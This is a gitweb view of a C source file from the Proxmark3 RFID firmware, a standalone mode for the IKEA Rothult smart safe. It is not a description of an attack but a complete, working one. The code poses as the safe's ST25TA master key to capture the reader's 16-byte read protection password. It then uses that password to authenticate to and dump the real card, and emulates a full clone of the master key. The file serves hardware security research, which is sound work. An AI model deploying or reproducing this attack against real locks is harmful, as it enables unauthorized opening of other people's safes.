search:
summary | log | graphiclog1 | graphiclog2 | commit | commitdiff | tree | refs | edit | fork
blame | history | raw | HEAD
Merge pull request #2741 from Donny-Guo/hidbrute
[RRG-proxmark3.git] / armsrc / Standalone / hf_tcprst.c
blob9b42d0fd042507198f551e6291283fb59ffee429
1 //-----------------------------------------------------------------------------
2 // Copyright (C) Nick Draffen, 2020
3 // Copyright (C) Proxmark3 contributors. See AUTHORS.md for details.
4 //
5 // This program is free software: you can redistribute it and/or modify
6 // it under the terms of the GNU General Public License as published by
7 // the Free Software Foundation, either version 3 of the License, or
8 // (at your option) any later version.
9 //
10 // This program is distributed in the hope that it will be useful,
11 // but WITHOUT ANY WARRANTY; without even the implied warranty of
12 // MERCHANTABILITY or FITNESS FOR A PARTICULAR PURPOSE. See the
13 // GNU General Public License for more details.
14 //
15 // See LICENSE.txt for the text of the license.
16 //-----------------------------------------------------------------------------
17 // code for HF ST25TA IKEA Rothult read/sim/dump/emulation by Nick Draffen
18 //-----------------------------------------------------------------------------
19 #include "standalone.h"
20 #include "proxmark3_arm.h"
21 #include "appmain.h"
22 #include "fpgaloader.h"
23 #include "util.h"
24 #include "dbprint.h"
25 #include "ticks.h"
26 #include "string.h"
27 #include "BigBuf.h"
28 #include "iso14443a.h"
29 #include "protocols.h"
30 #include "cmd.h"
31
32 void ModInfo(void) {
33 DbpString(" HF - IKEA Rothult ST25TA, Standalone Master Key Dump/Emulation (ISO14443) - (Nick Draffen)");
34 }
35
36 /* This standalone implements four different modes: reading, simulating, dumping, & emulating.
37 *
38 * The initial mode is reading with LEDs A & D.
39 * In this mode, the Proxmark3 is looking for an ST25TA card like those used by the IKEA Rothult,
40 * it will act as reader, and store the UID for simulation.
41 *
42 * If the Proxmark3 gets an ST25TA UID, it will change to simulation mode (LEDs A & C) automatically.
43 * During this mode the Proxmark3 will pretend to be the IKEA Rothult ST25TA master key, upon presentation
44 * to an IKEA Rothult the Proxmark3 will steal the 16 byte Read Protection key used to authenticate to the card.
45 *
46 * Once it gets the key, it will switch to dump mode (LEDs C & D) automatically. During this mode the Proxmark3
47 * will act as a reader once again, but now we know the Read Protection key to authenticate to the card to dump
48 * it's contents so we can achieve full emulation.
49 *
50 * Once it dumps the contents of the card, it will switch to emulation mode (LED C) automatically.
51 * During this mode the Proxmark3 should function as the original ST25TA IKEA Rothult Master Key
52 *
53 * Keep pressing the button down will quit the standalone cycle.
54 *
55 * LEDs:
56 * LED A & D = in reading mode
57 * LED A & C = in simulation mode, to steal Read Protection key
58 * LED C & D = in dump mode, to authenticate to card and dump NDEF content
59 * LED C = in emulation mode
60 * LED B = receiving/sending commands, activity
61 *
62 * Thanks to Salvador Mendoza for which this standalone mode is based off
63 * Thanks to iceman for his assistance on the ST25TA research
64 */
65
66 void RunMod(void) {
67 StandAloneMode();
68 DbpString(_YELLOW_(">>") "IKEA Rothult ST25TA Standalone (tcprst) Started " _YELLOW_("<<"));
69 FpgaDownloadAndGo(FPGA_BITSTREAM_HF);
70
71 uint8_t stuid[7] = {0x00};
72
73 //For reading process
74 iso14a_card_select_t card_a_info;
75 uint8_t apdubuffer[MAX_FRAME_SIZE] = { 0x00 };
76
77 // APDUs necessary to dump NDEF
78 // ----------------------------
79 // Select NDEF Application
80 uint8_t ndef_app[13] = {0x00, 0xa4, 0x04, 0x00, 0x07, 0xd2, 0x76, 0x00, 0x00, 0x85, 0x01, 0x01, 0x00};
81 // Select NDEF File
82 uint8_t ndef_sel[7] = {0x00, 0xa4, 0x00, 0x0c, 0x02, 0x00, 0x01};
83 // Read verification without password
84 uint8_t verify[5] = {0x00, 0x20, 0x00, 0x01, 0x00};
85 // Read verification with password
86 uint8_t verify_pwd[21] = {0x00, 0x20, 0x00, 0x01, 0x10, 0x00, 0x00, 0x00, 0x00, 0x00, 0x00, 0x00, 0x00, 0x00, 0x00, 0x00, 0x00, 0x00, 0x00, 0x00, 0x00};
87 // Read NDEF file contents
88 uint8_t ndef_read[5] = {0x00, 0xb0, 0x00, 0x00, 0x1d};
89
90 uint8_t *apdus[5] = {ndef_app, ndef_sel, verify, verify_pwd, ndef_read};
91 uint8_t apdusLen [5] = { sizeof(ndef_app), sizeof(ndef_sel), sizeof(verify), sizeof(verify_pwd), sizeof(ndef_read)};
92
93 // NDEF file contents
94 uint8_t ndef[31] = {0x00, 0x1b, 0xd1, 0x01, 0x17, 0x54, 0x02, 0x7a, 0x68, 0xa2, 0x34, 0xcb, 0xd0, 0xe2, 0x03, 0xc7, 0x3e, 0x62, 0x0b, 0xe8, 0xc6, 0x3c, 0x85, 0x2c, 0xc5, 0x31, 0x31, 0x31, 0x32, 0x90, 0x00};
95 uint8_t ndef_len = 31;
96
97 // Did we get the read protection key from the Rothult
98 bool gotkey = false;
99 // Did we get the NDEF file contents from the card
100 bool gotndef = false;
101
102
103 //ST25TA Rothult values
104 #define SAK 0x20
105 #define ATQA0 0x42
106 #define ATQA1 0x00
107
108 // Allocate 512 bytes for the dynamic modulation, created when the reader queries for it
109 // Such a response is less time critical, so we can prepare them on the fly
110 #define DYNAMIC_RESPONSE_BUFFER_SIZE 64
111 #define DYNAMIC_MODULATION_BUFFER_SIZE 512
112
113 uint8_t flags = 0;
114 FLAG_SET_UID_IN_DATA(flags, 7); // ST25TA have 7B UID
115 uint8_t data[PM3_CMD_DATA_SIZE] = {0x00}; // in case there is a read command received we shouldn't break
116
117 // to initialize the emulation
118 uint8_t tagType = 10; // 10 = ST25TA IKEA Rothult
119 tag_response_info_t *responses;
120 uint32_t cuid = 0;
121 uint32_t counters[3] = { 0x00, 0x00, 0x00 };
122 uint8_t tearings[3] = { 0xbd, 0xbd, 0xbd };
123 uint8_t pages = 0;
124
125 // command buffers
126 uint8_t receivedCmd[MAX_FRAME_SIZE] = { 0x00 };
127 uint8_t receivedCmdPar[MAX_PARITY_SIZE] = { 0x00 };
128
129 uint8_t dynamic_response_buffer[DYNAMIC_RESPONSE_BUFFER_SIZE] = {0};
130 uint8_t dynamic_modulation_buffer[DYNAMIC_MODULATION_BUFFER_SIZE] = {0};
131
132 // handler - command responses
133 tag_response_info_t dynamic_response_info = {
134 .response = dynamic_response_buffer,
135 .response_n = 0,
136 .modulation = dynamic_modulation_buffer,
137 .modulation_n = 0
138 };
139
140 // States for standalone
141 #define STATE_READ 0
142 #define STATE_SIM 1
143 #define STATE_DUMP 2
144 #define STATE_EMUL 3
145
146 uint8_t state = STATE_READ;
147
148 DbpString(_YELLOW_("[ ") "Initialized reading mode" _YELLOW_(" ]"));
149 DbpString("\n"_YELLOW_("!!") "Waiting for an IKEA ST25TA card...");
150
151 for (;;) {
152 WDT_HIT();
153
154 // exit from RunMod, send a usbcommand.
155 if (data_available()) break;
156
157 // Was our button held down or pressed?
158 int button_pressed = BUTTON_HELD(1000);
159
160 if (button_pressed == BUTTON_HOLD) { //Holding down the button
161 break;
162 }
163
164 SpinDelay(500);
165
166 if (state == STATE_READ) {
167 LED_D_ON();
168 LED_A_ON();
169 // Get UID of ST25TA Card to simulate
170 iso14443a_setup(FPGA_HF_ISO14443A_READER_MOD);
171
172 if (iso14443a_select_card(NULL, &card_a_info, NULL, true, 0, false)) {
173
174 DbpString(_YELLOW_("+") "Found ISO 14443 Type A!");
175
176 if (card_a_info.sak == SAK && card_a_info.atqa[0] == ATQA0 && card_a_info.atqa[1] == ATQA1 && card_a_info.uidlen == 7) {
177 DbpString(_YELLOW_("+") "Found ST25TA with UID: ");
178 Dbhexdump(card_a_info.uidlen, card_a_info.uid, 0);
179 memcpy(stuid, card_a_info.uid, card_a_info.uidlen);
180 state = STATE_SIM;
181 } else {
182 DbpString("Found non-ST25TA card, ignoring.");
183 }
184 }
185 FpgaWriteConfWord(FPGA_MAJOR_MODE_OFF);
186 } else if (state == STATE_SIM) {
187 LED_C_ON();
188
189 //Simulate tag to get PWD
190
191 // free eventually allocated BigBuf memory but keep Emulator Memory
192 BigBuf_free_keep_EM();
193
194 memcpy(data, stuid, sizeof(stuid));
195
196 if (SimulateIso14443aInit(tagType, flags, data, NULL, 0, &responses, &cuid, counters, tearings, &pages) == false) {
197 BigBuf_free_keep_EM();
198 reply_ng(CMD_HF_MIFARE_SIMULATE, PM3_EINIT, NULL, 0);
199 DbpString(_YELLOW_("!!") "Error initializing the simulation process!");
200 SpinDelay(500);
201 state = STATE_READ;
202 DbpString(_YELLOW_("[ ") "Initialized reading mode" _YELLOW_(" ]"));
203 DbpString("\n" _YELLOW_("!!") "Waiting for an ST25TA card...");
204 continue;
205 }
206
207 // We need to listen to the high-frequency, peak-detected path.
208 iso14443a_setup(FPGA_HF_ISO14443A_TAGSIM_LISTEN);
209
210 int len = 0; // command length
211 int retval = PM3_SUCCESS; // to check emulation status
212
213 bool odd_reply = true;
214
215 clear_trace();
216 set_tracing(true);
217
218 while (!gotkey) {
219 LED_B_OFF();
220 // Clean receive command buffer
221 if (!GetIso14443aCommandFromReader(receivedCmd, sizeof(receivedCmd), receivedCmdPar, &len)) {
222 DbpString(_YELLOW_("!!") "Emulator stopped");
223 retval = PM3_EOPABORTED;
224 break;
225 }
226 tag_response_info_t *p_response = NULL;
227 LED_B_ON();
228
229 // dynamic_response_info will be in charge of responses
230 dynamic_response_info.response_n = 0;
231
232 // Checking the commands order is important and elemental
233 if (receivedCmd[0] == ISO14443A_CMD_REQA && len == 1) { // Received a REQUEST
234 odd_reply = !odd_reply;
235 if (odd_reply)
236 p_response = &responses[RESP_INDEX_ATQA];
237 } else if (receivedCmd[0] == ISO14443A_CMD_HALT && len == 4) { // Received a HALT
238 p_response = NULL;
239 } else if (receivedCmd[0] == ISO14443A_CMD_WUPA && len == 1) { // Received a WAKEUP
240 p_response = &responses[RESP_INDEX_ATQA];
241 } else if (receivedCmd[1] == 0x20 && receivedCmd[0] == ISO14443A_CMD_ANTICOLL_OR_SELECT && len == 2) { // Received request for UID (cascade 1)
242 p_response = &responses[RESP_INDEX_UIDC1];
243 } else if (receivedCmd[1] == 0x20 && receivedCmd[0] == ISO14443A_CMD_ANTICOLL_OR_SELECT_2 && len == 2) { // Received request for UID (cascade 2)
244 p_response = &responses[RESP_INDEX_UIDC2];
245 } else if (receivedCmd[1] == 0x70 && receivedCmd[0] == ISO14443A_CMD_ANTICOLL_OR_SELECT && len == 9) { // Received a SELECT (cascade 1)
246 p_response = &responses[RESP_INDEX_SAKC1];
247 } else if (receivedCmd[1] == 0x70 && receivedCmd[0] == ISO14443A_CMD_ANTICOLL_OR_SELECT_2 && len == 9) { // Received a SELECT (cascade 2)
248 p_response = &responses[RESP_INDEX_SAKC2];
249 } else if (receivedCmd[0] == ISO14443A_CMD_RATS && len == 4) { // Received a RATS request
250 p_response = &responses[RESP_INDEX_RATS];
251 } else if (receivedCmd[0] == ISO14443A_CMD_PPS) {
252 p_response = &responses[RESP_INDEX_PPS];
253 } else {
254 DbpString(_YELLOW_("[ ") "Card reader command" _YELLOW_(" ]"));
255 Dbhexdump(len, receivedCmd, false);
256
257 if (receivedCmd[0] == 0x02 || receivedCmd[0] == 0x03) { //Emulate an ST25TA IKEA Rothult Master Key
258 dynamic_response_info.response[0] = receivedCmd[0];
259
260 if (memcmp("\x02\xa2\xb0\x00\x00\x1d\x51\x69", receivedCmd, 8) == 0) {
261 memcpy(dynamic_response_info.response + 1, ndef, 31);
262 dynamic_response_info.response_n = 32;
263 } else if (memcmp("\x02\x00\x20\x00\x01\x00\x6e\xa9", receivedCmd, 8) == 0) {
264 dynamic_response_info.response[1] = 0x63;
265 dynamic_response_info.response[2] = 0x00;
266 dynamic_response_info.response_n = 3;
267 } else if (memcmp("\x03\x00\x20\x00\x01\x10", receivedCmd, 6) == 0) {
268 memcpy(verify_pwd + 5, receivedCmd + 6, 16);
269 DbpString("Reader sent password: ");
270 Dbhexdump(16, verify_pwd + 5, 0);
271 dynamic_response_info.response[1] = 0x90;
272 dynamic_response_info.response[2] = 0x00;
273 dynamic_response_info.response_n = 3;
274 gotkey = true;
275 state = STATE_DUMP;
276 } else {
277 dynamic_response_info.response[1] = 0x90;
278 dynamic_response_info.response[2] = 0x00;
279 dynamic_response_info.response_n = 3;
280 }
281 } else {
282 DbpString(_YELLOW_("!!") "Received unknown command!");
283 memcpy(dynamic_response_info.response, receivedCmd, len);
284 dynamic_response_info.response_n = len;
285 }
286 }
287 if (dynamic_response_info.response_n > 0) {
288 DbpString(_GREEN_("[ ") "Proxmark3 answer" _GREEN_(" ]"));
289 Dbhexdump(dynamic_response_info.response_n, dynamic_response_info.response, false);
290 DbpString("----");
291
292 // Add CRC bytes, always used in ISO 14443A-4 compliant cards
293 AddCrc14A(dynamic_response_info.response, dynamic_response_info.response_n);
294 dynamic_response_info.response_n += 2;
295
296 if (prepare_tag_modulation(&dynamic_response_info, DYNAMIC_MODULATION_BUFFER_SIZE) == false) {
297 SpinDelay(500);
298 DbpString(_YELLOW_("!!") "Error preparing Proxmark to answer!");
299 continue;
300 }
301 p_response = &dynamic_response_info;
302 }
303
304 if (p_response != NULL) {
305 EmSendPrecompiledCmd(p_response);
306 }
307 }
308 switch_off();
309
310 set_tracing(false);
311 BigBuf_free_keep_EM();
312 reply_ng(CMD_HF_MIFARE_SIMULATE, retval, NULL, 0);
313
314 } else if (state == STATE_DUMP) {
315 LED_A_OFF();
316 LED_C_ON();
317 LED_D_ON();
318
319 iso14443a_setup(FPGA_HF_ISO14443A_READER_MOD);
320
321 if (iso14443a_select_card(NULL, &card_a_info, NULL, true, 0, false)) {
322
323 DbpString(_YELLOW_("+") "Found ISO 14443 Type A!");
324
325 for (uint8_t i = 0; i < 5; i++) {
326 gotndef = false;
327 LED_B_ON();
328 uint8_t apdulen = iso14_apdu(apdus[i], (uint16_t) apdusLen[i], false, apdubuffer, sizeof(apdubuffer), NULL);
329
330 if (apdulen > 2) {
331 DbpString(_YELLOW_("[ ") "Proxmark command" _YELLOW_(" ]"));
332 Dbhexdump(apdusLen[i], apdus[i], false);
333 DbpString(_GREEN_("[ ") "Card answer" _GREEN_(" ]"));
334 Dbhexdump(apdulen - 2, apdubuffer, false);
335 DbpString("----");
336
337
338 if (i == 4) {
339 // Get NDEF Data
340 if (apdubuffer[1] == 0x1b && apdubuffer[2] == 0xd1) {
341 gotndef = true;
342 memcpy(&ndef, &apdubuffer, apdulen - 2);
343 break;
344 }
345 }
346
347 } else {
348 DbpString(_YELLOW_("!!") "Error reading the card");
349 }
350 LED_B_OFF();
351 }
352
353 if (gotndef) {
354 DbpString(_RED_("[ ") "NDEF File" _RED_(" ]"));
355 Dbhexdump(ndef_len, (uint8_t *)ndef, false);
356 DbpString("---");
357 LED_C_ON();
358 state = STATE_EMUL;
359 DbpString(_YELLOW_("[ ") "Initialized emulation mode" _YELLOW_(" ]"));
360 DbpString("\n"_YELLOW_("!!") "Waiting for a card reader...");
361 }
362 }
363 FpgaWriteConfWord(FPGA_MAJOR_MODE_OFF);
364
365 } else if (state == STATE_EMUL) {
366 LED_D_OFF();
367 LED_C_ON();
368
369 // free eventually allocated BigBuf memory but keep Emulator Memory
370 BigBuf_free_keep_EM();
371
372 memcpy(data, stuid, sizeof(stuid));
373
374 if (SimulateIso14443aInit(tagType, flags, data, NULL, 0, &responses, &cuid, counters, tearings, &pages) == false) {
375 BigBuf_free_keep_EM();
376 reply_ng(CMD_HF_MIFARE_SIMULATE, PM3_EINIT, NULL, 0);
377 DbpString(_YELLOW_("!!") "Error initializing the simulation process!");
378 SpinDelay(500);
379 state = STATE_READ;
380 DbpString(_YELLOW_("[ ") "Initialized reading mode" _YELLOW_(" ]"));
381 DbpString("\n" _YELLOW_("!!") "Waiting for an ST25TA card...");
382 continue;
383 }
384
385 // We need to listen to the high-frequency, peak-detected path.
386 iso14443a_setup(FPGA_HF_ISO14443A_TAGSIM_LISTEN);
387
388 int len = 0; // command length
389 int retval = PM3_SUCCESS; // to check emulation status
390
391 bool odd_reply = true;
392
393 clear_trace();
394 set_tracing(true);
395
396 for (;;) {
397 LED_B_OFF();
398 // Clean receive command buffer
399 if (!GetIso14443aCommandFromReader(receivedCmd, sizeof(receivedCmd), receivedCmdPar, &len)) {
400 DbpString(_YELLOW_("!!") "Emulator stopped");
401 retval = PM3_EOPABORTED;
402 break;
403 }
404 tag_response_info_t *p_response = NULL;
405 LED_B_ON();
406
407 // dynamic_response_info will be in charge of responses
408 dynamic_response_info.response_n = 0;
409
410 // Checking the commands order is important and elemental
411 if (receivedCmd[0] == ISO14443A_CMD_REQA && len == 1) { // Received a REQUEST
412 odd_reply = !odd_reply;
413 if (odd_reply)
414 p_response = &responses[RESP_INDEX_ATQA];
415 } else if (receivedCmd[0] == ISO14443A_CMD_HALT && len == 4) { // Received a HALT
416 p_response = NULL;
417 } else if (receivedCmd[0] == ISO14443A_CMD_WUPA && len == 1) { // Received a WAKEUP
418 p_response = &responses[RESP_INDEX_ATQA];
419 } else if (receivedCmd[1] == 0x20 && receivedCmd[0] == ISO14443A_CMD_ANTICOLL_OR_SELECT && len == 2) { // Received request for UID (cascade 1)
420 p_response = &responses[RESP_INDEX_UIDC1];
421 } else if (receivedCmd[1] == 0x20 && receivedCmd[0] == ISO14443A_CMD_ANTICOLL_OR_SELECT_2 && len == 2) { // Received request for UID (cascade 2)
422 p_response = &responses[RESP_INDEX_UIDC2];
423 } else if (receivedCmd[1] == 0x70 && receivedCmd[0] == ISO14443A_CMD_ANTICOLL_OR_SELECT && len == 9) { // Received a SELECT (cascade 1)
424 p_response = &responses[RESP_INDEX_SAKC1];
425 } else if (receivedCmd[1] == 0x70 && receivedCmd[0] == ISO14443A_CMD_ANTICOLL_OR_SELECT_2 && len == 9) { // Received a SELECT (cascade 2)
426 p_response = &responses[RESP_INDEX_SAKC2];
427 } else if (receivedCmd[0] == ISO14443A_CMD_RATS && len == 4) { // Received a RATS request
428 p_response = &responses[RESP_INDEX_RATS];
429 } else if (receivedCmd[0] == ISO14443A_CMD_PPS) {
430 p_response = &responses[RESP_INDEX_PPS];
431 } else {
432 DbpString(_YELLOW_("[ ") "Card reader command" _YELLOW_(" ]"));
433 Dbhexdump(len, receivedCmd, false);
434
435 if (receivedCmd[0] == 0x02 || receivedCmd[0] == 0x03) { //Emulate an ST25TA IKEA Rothult Master Key
436 dynamic_response_info.response[0] = receivedCmd[0];
437
438 if (memcmp("\x02\xa2\xb0\x00\x00\x1d\x51\x69", receivedCmd, 8) == 0) {
439 memcpy(dynamic_response_info.response + 1, ndef, 31);
440 dynamic_response_info.response_n = 32;
441 } else if (memcmp("\x02\x00\x20\x00\x01\x00\x6e\xa9", receivedCmd, 8) == 0) {
442 dynamic_response_info.response[1] = 0x63;
443 dynamic_response_info.response[2] = 0x00;
444 dynamic_response_info.response_n = 3;
445 } else if (memcmp("\x03\x00\x20\x00\x01\x10", receivedCmd, 6) == 0) {
446 memcpy(verify_pwd + 5, receivedCmd + 6, 16);
447 DbpString("Reader sent password: ");
448 Dbhexdump(16, verify_pwd + 5, 0);
449 dynamic_response_info.response[1] = 0x90;
450 dynamic_response_info.response[2] = 0x00;
451 dynamic_response_info.response_n = 3;
452 } else {
453 dynamic_response_info.response[1] = 0x90;
454 dynamic_response_info.response[2] = 0x00;
455 dynamic_response_info.response_n = 3;
456 }
457 } else {
458 DbpString(_YELLOW_("!!") "Received unknown command!");
459 memcpy(dynamic_response_info.response, receivedCmd, len);
460 dynamic_response_info.response_n = len;
461 }
462 }
463 if (dynamic_response_info.response_n > 0) {
464 DbpString(_GREEN_("[ ") "Proxmark3 answer" _GREEN_(" ]"));
465 Dbhexdump(dynamic_response_info.response_n, dynamic_response_info.response, false);
466 DbpString("----");
467
468 // Add CRC bytes, always used in ISO 14443A-4 compliant cards
469 AddCrc14A(dynamic_response_info.response, dynamic_response_info.response_n);
470 dynamic_response_info.response_n += 2;
471
472 if (prepare_tag_modulation(&dynamic_response_info, DYNAMIC_MODULATION_BUFFER_SIZE) == false) {
473 SpinDelay(500);
474 DbpString(_YELLOW_("!!") "Error preparing Proxmark to answer!");
475 continue;
476 }
477 p_response = &dynamic_response_info;
478 }
479
480 if (p_response != NULL) {
481 EmSendPrecompiledCmd(p_response);
482 }
483 }
484 switch_off();
485
486 set_tracing(false);
487 BigBuf_free_keep_EM();
488 reply_ng(CMD_HF_MIFARE_SIMULATE, retval, NULL, 0);
489 }
490 }
491 DbpString(_YELLOW_("[=]") "exiting");
492 LEDsoff();
493 }
Proxmark3 - the RFID research Swiss army knife. Iceman firmware